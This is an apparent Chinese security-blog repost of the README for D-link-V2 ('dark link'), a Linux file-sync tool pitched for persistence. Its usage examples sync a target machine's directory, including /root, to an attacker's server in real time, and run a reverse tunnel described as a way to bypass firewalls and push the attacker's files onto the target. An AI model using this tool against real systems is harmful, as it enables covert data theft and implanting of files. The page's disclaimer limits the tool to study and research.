D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux

2025-03-25 23 0

D-link

地址:https://github.com/MartinxMax/dlink

D-link 是一个轻量级的 Linux 文件同步工具,使用 C++ 编写。

  1. 目录监控与实时同步更新。

  2. 访问控制:客户端仅允许自动上传和删除文件,不能下载服务器上的敏感文件。即使同步文件从服务器删除,客户端也会帮助恢复到服务器。

  3. 持久性:可以与 Tyrant 或 S-Clustr 一起使用,形成一个强大的自愈网络集群。

  4. Tyrant: [https://github.com/MartinxMax/Tyrant]

  5. S-Clustr:[https://github.com/MartinxMax/S-Clustr]

  6. 通信使用 AES 加密,确保文件同步过程加密,防止中间人攻击。

  7. 在文件同步过程中,实时显示上传和下载的数据。

  8. 使用密钥进行身份验证,防止未经授权的同步操作。

  9. 回环地址同步速度可达 200MB/s,而 LAN 同步速度大约为 20MB/s。

使用方法

$ ./dlink -h

D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux插图

D-link 转发隧道(客户端到服务器文件同步)

示例:(将目标目录实时同步到攻击者的目录)

服务器:

D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux插图1

$ ./dlink server --port <LOCAL-PORT> --path <PATH>

D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux插图2

客户端:

创建一个 200MB 的测试文件用于传输

$ dd if=/dev/urandom of=rand_file bs=1M count=200

D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux插图3

$ ./dlink client --endpoint <IP:PORT> --path <PATH> --key <KEY>

D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux插图4

服务器:

D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux插图5

Wireshark:

D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux插图6

D-link 反向隧道(服务器到客户端文件同步)

PS:通常用于绕过防火墙并防止数据拦截。

示例:(将攻击者的目录实时同步到目标目录)

服务器:

D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux插图7

$ ./dlink server --port <LOCAL-PORT> --path <PATH> --reverse

D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux插图8

$ ./dlink client --endpoint <IP:PORT> --path <PATH> --key <KEY> --reverse

D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux插图9

D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux插图10

双向同步

服务器:

$ ./dlink server --port 10098 --path /tmp/root --key abcdefgh&
$ ./dlink server --port 10099 --path /tmp/root --key abcdefgh --reverse

客户端:

$ ./dlink client --endpoint "<SERVER>:10098" --path /root --key abcdefgh &
$ ./dlink client --endpoint "<SERVER>:10099" --path /root --key abcdefgh --reverse

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

AI Agent:功能、架构与安全风险
FlowiseAI 任意文件写入漏洞(CVE-2025–26319)
DrayTek再现未授权RCE漏洞:CVE-2024-12987复现分析
Mozilla紧急修复Firefox高危漏洞 与Chrome零日漏洞原理相似
数据跨境 | 韩国数据安全与跨境合规实践
Mage-AI 不安全的默认身份验证设置导致0day远程命令执行漏洞(CVE-2025-2129)

发布评论